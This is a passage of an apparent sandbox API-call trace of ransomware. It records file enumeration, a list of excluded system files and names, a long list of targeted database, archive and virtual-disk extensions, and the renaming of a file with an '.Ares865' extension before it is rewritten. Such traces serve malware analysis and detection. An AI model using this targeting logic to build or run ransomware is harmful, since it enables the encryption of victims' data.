dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.240] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.240] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.240] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.240] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.240] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.241] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.241] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.241] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.241] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.241] CloseHandle (hObject=0x15c) returned 1 [0089.242] CloseHandle (hObject=0x118) returned 1 [0089.242] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.242] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.242] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.242] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f112be3, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f112be3, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7be8cbf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="print_queue.ico", cAlternateFileName="")) returned 1 [0089.242] lstrcmpiW (lpString1="print_queue.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.242] lstrcmpiW (lpString1="print_queue.ico", lpString2="aoldtz.exe") returned 1 [0089.242] lstrcmpiW (lpString1="print_queue.ico", lpString2=".") returned 1 [0089.242] lstrcmpiW (lpString1="print_queue.ico", lpString2="..") returned 1 [0089.242] lstrcmpiW (lpString1="print_queue.ico", lpString2="windows") returned -1 [0089.242] lstrcmpiW (lpString1="print_queue.ico", lpString2="bootmgr") returned 1 [0089.242] lstrcmpiW (lpString1="print_queue.ico", lpString2="temp") returned -1 [0089.242] lstrcmpiW (lpString1="print_queue.ico", lpString2="pagefile.sys") returned 1 [0089.242] lstrcmpiW (lpString1="print_queue.ico", lpString2="boot") returned 1 [0089.242] lstrcmpiW (lpString1="print_queue.ico", lpString2="ids.txt") returned 1 [0089.242] lstrcmpiW (lpString1="print_queue.ico", lpString2="ntuser.dat") returned 1 [0089.242] lstrcmpiW (lpString1="print_queue.ico", lpString2="perflogs") returned 1 [0089.242] lstrcmpiW (lpString1="print_queue.ico", lpString2="MSBuild") returned 1 [0089.242] lstrlenW (lpString="print_queue.ico") returned 15 [0089.243] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned 104 [0089.243] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="print_queue.ico" | out: lpString1="print_queue.ico") returned="print_queue.ico" [0089.243] lstrlenW (lpString="print_queue.ico") returned 15 [0089.243] lstrlenW (lpString="Ares865") returned 7 [0089.243] lstrcmpiW (lpString1="eue.ico", lpString2="Ares865") returned 1 [0089.243] lstrlenW (lpString=".dll") returned 4 [0089.243] lstrcmpiW (lpString1="print_queue.ico", lpString2=".dll") returned 1 [0089.243] lstrlenW (lpString=".lnk") returned 4 [0089.243] lstrcmpiW (lpString1="print_queue.ico", lpString2=".lnk") returned 1 [0089.243] lstrlenW (lpString=".ini") returned 4 [0089.243] lstrcmpiW (lpString1="print_queue.ico", lpString2=".ini") returned 1 [0089.243] lstrlenW (lpString=".sys") returned 4 [0089.243] lstrcmpiW (lpString1="print_queue.ico", lpString2=".sys") returned 1 [0089.243] lstrlenW (lpString="print_queue.ico") returned 15 [0089.243] lstrlenW (lpString="bak") returned 3 [0089.243] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0089.243] lstrlenW (lpString="ba_") returned 3 [0089.243] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0089.243] lstrlenW (lpString="dbb") returned 3 [0089.243] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0089.243] lstrlenW (lpString="vmdk") returned 4 [0089.243] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0089.243] lstrlenW (lpString="rar") returned 3 [0089.243] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0089.243] lstrlenW (lpString="zip") returned 3 [0089.243] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0089.243] lstrlenW (lpString="tgz") returned 3 [0089.243] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0089.243] lstrlenW (lpString="vbox") returned 4 [0089.243] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0089.243] lstrlenW (lpString="vdi") returned 3 [0089.243] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0089.243] lstrlenW (lpString="vhd") returned 3 [0089.243] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0089.243] lstrlenW (lpString="vhdx") returned 4 [0089.243] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0089.243] lstrlenW (lpString="avhd") returned 4 [0089.243] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0089.244] lstrlenW (lpString="db") returned 2 [0089.244] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0089.244] lstrlenW (lpString="db2") returned 3 [0089.244] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0089.244] lstrlenW (lpString="db3") returned 3 [0089.244] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0089.244] lstrlenW (lpString="dbf") returned 3 [0089.244] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0089.244] lstrlenW (lpString="mdf") returned 3 [0089.244] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0089.244] lstrlenW (lpString="mdb") returned 3 [0089.244] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0089.244] lstrlenW (lpString="sql") returned 3 [0089.244] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0089.244] lstrlenW (lpString="sqlite") returned 6 [0089.244] lstrcmpiW (lpString1="ue.ico", lpString2="sqlite") returned 1 [0089.244] lstrlenW (lpString="sqlite3") returned 7 [0089.244] lstrcmpiW (lpString1="eue.ico", lpString2="sqlite3") returned -1 [0089.244] lstrlenW (lpString="sqlitedb") returned 8 [0089.244] lstrcmpiW (lpString1="ueue.ico", lpString2="sqlitedb") returned 1 [0089.244] lstrlenW (lpString="xml") returned 3 [0089.244] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0089.244] lstrlenW (lpString="$er") returned 3 [0089.244] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0089.244] lstrlenW (lpString="4dd") returned 3 [0089.244] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0089.244] lstrlenW (lpString="4dl") returned 3 [0089.244] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0089.244] lstrlenW (lpString="^^^") returned 3 [0089.244] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0089.244] lstrlenW (lpString="abs") returned 3 [0089.244] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0089.244] lstrlenW (lpString="abx") returned 3 [0089.244] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0089.244] lstrlenW (lpString="accdb") returned 5 [0089.244] lstrcmpiW (lpString1="e.ico", lpString2="accdb") returned 1 [0089.244] lstrlenW (lpString="accdc") returned 5 [0089.244] lstrcmpiW (lpString1="e.ico", lpString2="accdc") returned 1 [0089.244] lstrlenW (lpString="accde") returned 5 [0089.244] lstrcmpiW (lpString1="e.ico", lpString2="accde") returned 1 [0089.245] lstrlenW (lpString="accdr") returned 5 [0089.245] lstrcmpiW (lpString1="e.ico", lpString2="accdr") returned 1 [0089.245] lstrlenW (lpString="accdt") returned 5 [0089.245] lstrcmpiW (lpString1="e.ico", lpString2="accdt") returned 1 [0089.245] lstrlenW (lpString="accdw") returned 5 [0089.245] lstrcmpiW (lpString1="e.ico", lpString2="accdw") returned 1 [0089.245] lstrlenW (lpString="accft") returned 5 [0089.245] lstrcmpiW (lpString1="e.ico", lpString2="accft") returned 1 [0089.245] lstrlenW (lpString="adb") returned 3 [0089.245] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.245] lstrlenW (lpString="adb") returned 3 [0089.245] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.245] lstrlenW (lpString="ade") returned 3 [0089.245] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0089.245] lstrlenW (lpString="adf") returned 3 [0089.245] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0089.245] lstrlenW (lpString="adn") returned 3 [0089.245] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0089.245] lstrlenW (lpString="adp") returned 3 [0089.245] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0089.245] lstrlenW (lpString="alf") returned 3 [0089.245] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0089.245] lstrlenW (lpString="ask") returned 3 [0089.245] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0089.245] lstrlenW (lpString="btr") returned 3 [0089.245] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0089.245] lstrlenW (lpString="cat") returned 3 [0089.245] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0089.245] lstrlenW (lpString="cdb") returned 3 [0089.245] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0089.245] lstrlenW (lpString="ckp") returned 3 [0089.245] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0089.245] lstrlenW (lpString="cma") returned 3 [0089.245] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0089.245] lstrlenW (lpString="cpd") returned 3 [0089.245] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0089.245] lstrlenW (lpString="dacpac") returned 6 [0089.245] lstrcmpiW (lpString1="ue.ico", lpString2="dacpac") returned 1 [0089.246] lstrlenW (lpString="dad") returned 3 [0089.246] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0089.246] lstrlenW (lpString="dadiagrams") returned 10 [0089.246] lstrcmpiW (lpString1="_queue.ico", lpString2="dadiagrams") returned -1 [0089.246] lstrlenW (lpString="daschema") returned 8 [0089.246] lstrcmpiW (lpString1="ueue.ico", lpString2="daschema") returned 1 [0089.246] lstrlenW (lpString="db-journal") returned 10 [0089.246] lstrcmpiW (lpString1="_queue.ico", lpString2="db-journal") returned -1 [0089.246] lstrlenW (lpString="db-shm") returned 6 [0089.246] lstrcmpiW (lpString1="ue.ico", lpString2="db-shm") returned 1 [0089.246] lstrlenW (lpString="db-wal") returned 6 [0089.246] lstrcmpiW (lpString1="ue.ico", lpString2="db-wal") returned 1 [0089.246] lstrlenW (lpString="dbc") returned 3 [0089.246] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0089.246] lstrlenW (lpString="dbs") returned 3 [0089.246] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0089.246] lstrlenW (lpString="dbt") returned 3 [0089.246] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0089.246] lstrlenW (lpString="dbv") returned 3 [0089.246] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0089.246] lstrlenW (lpString="dbx") returned 3 [0089.246] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0089.246] lstrlenW (lpString="dcb") returned 3 [0089.246] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0089.246] lstrlenW (lpString="dct") returned 3 [0089.246] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0089.246] lstrlenW (lpString="dcx") returned 3 [0089.246] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0089.246] lstrlenW (lpString="ddl") returned 3 [0089.246] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0089.246] lstrlenW (lpString="dlis") returned 4 [0089.246] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0089.246] lstrlenW (lpString="dp1") returned 3 [0089.246] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0089.246] lstrlenW (lpString="dqy") returned 3 [0089.246] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0089.246] lstrlenW (lpString="dsk") returned 3 [0089.247] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0089.247] lstrlenW (lpString="dsn") returned 3 [0089.247] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0089.247] lstrlenW (lpString="dtsx") returned 4 [0089.247] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0089.247] lstrlenW (lpString="dxl") returned 3 [0089.247] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0089.247] lstrlenW (lpString="eco") returned 3 [0089.247] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0089.247] lstrlenW (lpString="ecx") returned 3 [0089.247] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0089.247] lstrlenW (lpString="edb") returned 3 [0089.247] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0089.247] lstrlenW (lpString="epim") returned 4 [0089.247] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0089.247] lstrlenW (lpString="fcd") returned 3 [0089.247] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0089.247] lstrlenW (lpString="fdb") returned 3 [0089.247] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0089.247] lstrlenW (lpString="fic") returned 3 [0089.247] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0089.247] lstrlenW (lpString="flexolibrary") returned 12 [0089.247] lstrcmpiW (lpString1="nt_queue.ico", lpString2="flexolibrary") returned 1 [0089.247] lstrlenW (lpString="fm5") returned 3 [0089.247] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0089.247] lstrlenW (lpString="fmp") returned 3 [0089.247] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0089.247] lstrlenW (lpString="fmp12") returned 5 [0089.247] lstrcmpiW (lpString1="e.ico", lpString2="fmp12") returned -1 [0089.247] lstrlenW (lpString="fmpsl") returned 5 [0089.247] lstrcmpiW (lpString1="e.ico", lpString2="fmpsl") returned -1 [0089.247] lstrlenW (lpString="fol") returned 3 [0089.247] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0089.247] lstrlenW (lpString="fp3") returned 3 [0089.247] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0089.247] lstrlenW (lpString="fp4") returned 3 [0089.247] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0089.247] lstrlenW (lpString="fp5") returned 3 [0089.248] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0089.248] lstrlenW (lpString="fp7") returned 3 [0089.248] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0089.248] lstrlenW (lpString="fpt") returned 3 [0089.248] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0089.248] lstrlenW (lpString="frm") returned 3 [0089.248] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0089.248] lstrlenW (lpString="gdb") returned 3 [0089.248] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.248] lstrlenW (lpString="gdb") returned 3 [0089.248] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.248] lstrlenW (lpString="grdb") returned 4 [0089.248] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0089.248] lstrlenW (lpString="gwi") returned 3 [0089.248] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0089.248] lstrlenW (lpString="hdb") returned 3 [0089.248] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0089.248] lstrlenW (lpString="his") returned 3 [0089.248] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0089.248] lstrlenW (lpString="ib") returned 2 [0089.248] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0089.248] lstrlenW (lpString="idb") returned 3 [0089.248] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0089.248] lstrlenW (lpString="ihx") returned 3 [0089.248] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0089.248] lstrlenW (lpString="itdb") returned 4 [0089.248] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0089.248] lstrlenW (lpString="itw") returned 3 [0089.248] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0089.248] lstrlenW (lpString="jet") returned 3 [0089.248] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0089.248] lstrlenW (lpString="jtx") returned 3 [0089.248] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0089.248] lstrlenW (lpString="kdb") returned 3 [0089.248] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0089.248] lstrlenW (lpString="kexi") returned 4 [0089.248] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0089.248] lstrlenW (lpString="kexic") returned 5 [0089.248] lstrcmpiW (lpString1="e.ico", lpString2="kexic") returned -1 [0089.249] lstrlenW (lpString="kexis") returned 5 [0089.249] lstrcmpiW (lpString1="e.ico", lpString2="kexis") returned -1 [0089.249] lstrlenW (lpString="lgc") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0089.249] lstrlenW (lpString="lwx") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0089.249] lstrlenW (lpString="maf") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0089.249] lstrlenW (lpString="maq") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0089.249] lstrlenW (lpString="mar") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0089.249] lstrlenW (lpString="marshal") returned 7 [0089.249] lstrcmpiW (lpString1="eue.ico", lpString2="marshal") returned -1 [0089.249] lstrlenW (lpString="mas") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0089.249] lstrlenW (lpString="mav") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0089.249] lstrlenW (lpString="maw") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0089.249] lstrlenW (lpString="mdbhtml") returned 7 [0089.249] lstrcmpiW (lpString1="eue.ico", lpString2="mdbhtml") returned -1 [0089.249] lstrlenW (lpString="mdn") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0089.249] lstrlenW (lpString="mdt") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0089.249] lstrlenW (lpString="mfd") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0089.249] lstrlenW (lpString="mpd") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0089.249] lstrlenW (lpString="mrg") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0089.249] lstrlenW (lpString="mud") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0089.249] lstrlenW (lpString="mwb") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0089.249] lstrlenW (lpString="myd") returned 3 [0089.249] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0089.250] lstrlenW (lpString="ndf") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0089.250] lstrlenW (lpString="nnt") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0089.250] lstrlenW (lpString="nrmlib") returned 6 [0089.250] lstrcmpiW (lpString1="ue.ico", lpString2="nrmlib") returned 1 [0089.250] lstrlenW (lpString="ns2") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0089.250] lstrlenW (lpString="ns3") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0089.250] lstrlenW (lpString="ns4") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0089.250] lstrlenW (lpString="nsf") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0089.250] lstrlenW (lpString="nv") returned 2 [0089.250] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0089.250] lstrlenW (lpString="nv2") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0089.250] lstrlenW (lpString="nwdb") returned 4 [0089.250] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0089.250] lstrlenW (lpString="nyf") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0089.250] lstrlenW (lpString="odb") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.250] lstrlenW (lpString="odb") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.250] lstrlenW (lpString="oqy") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0089.250] lstrlenW (lpString="ora") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0089.250] lstrlenW (lpString="orx") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0089.250] lstrlenW (lpString="owc") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0089.250] lstrlenW (lpString="p96") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0089.250] lstrlenW (lpString="p97") returned 3 [0089.250] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0089.251] lstrlenW (lpString="pan") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0089.251] lstrlenW (lpString="pdb") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0089.251] lstrlenW (lpString="pdm") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0089.251] lstrlenW (lpString="pnz") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0089.251] lstrlenW (lpString="qry") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0089.251] lstrlenW (lpString="qvd") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0089.251] lstrlenW (lpString="rbf") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0089.251] lstrlenW (lpString="rctd") returned 4 [0089.251] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0089.251] lstrlenW (lpString="rod") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0089.251] lstrlenW (lpString="rodx") returned 4 [0089.251] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0089.251] lstrlenW (lpString="rpd") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0089.251] lstrlenW (lpString="rsd") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0089.251] lstrlenW (lpString="sas7bdat") returned 8 [0089.251] lstrcmpiW (lpString1="ueue.ico", lpString2="sas7bdat") returned 1 [0089.251] lstrlenW (lpString="sbf") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0089.251] lstrlenW (lpString="scx") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0089.251] lstrlenW (lpString="sdb") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0089.251] lstrlenW (lpString="sdc") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0089.251] lstrlenW (lpString="sdf") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0089.251] lstrlenW (lpString="sis") returned 3 [0089.251] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0089.252] lstrlenW (lpString="spq") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0089.252] lstrlenW (lpString="te") returned 2 [0089.252] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0089.252] lstrlenW (lpString="teacher") returned 7 [0089.252] lstrcmpiW (lpString1="eue.ico", lpString2="teacher") returned -1 [0089.252] lstrlenW (lpString="tmd") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0089.252] lstrlenW (lpString="tps") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0089.252] lstrlenW (lpString="trc") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.252] lstrlenW (lpString="trc") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.252] lstrlenW (lpString="trm") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0089.252] lstrlenW (lpString="udb") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0089.252] lstrlenW (lpString="udl") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0089.252] lstrlenW (lpString="usr") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0089.252] lstrlenW (lpString="v12") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0089.252] lstrlenW (lpString="vis") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0089.252] lstrlenW (lpString="vpd") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0089.252] lstrlenW (lpString="vvv") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0089.252] lstrlenW (lpString="wdb") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0089.252] lstrlenW (lpString="wmdb") returned 4 [0089.252] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0089.252] lstrlenW (lpString="wrk") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0089.252] lstrlenW (lpString="xdb") returned 3 [0089.252] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0089.253] lstrlenW (lpString="xld") returned 3 [0089.253] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0089.253] lstrlenW (lpString="xmlff") returned 5 [0089.253] lstrcmpiW (lpString1="e.ico", lpString2="xmlff") returned -1 [0089.253] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.Ares865") returned 109 [0089.253] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.ares865"), dwFlags=0x1) returned 1 [0089.254] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.254] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=57333) returned 1 [0089.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, 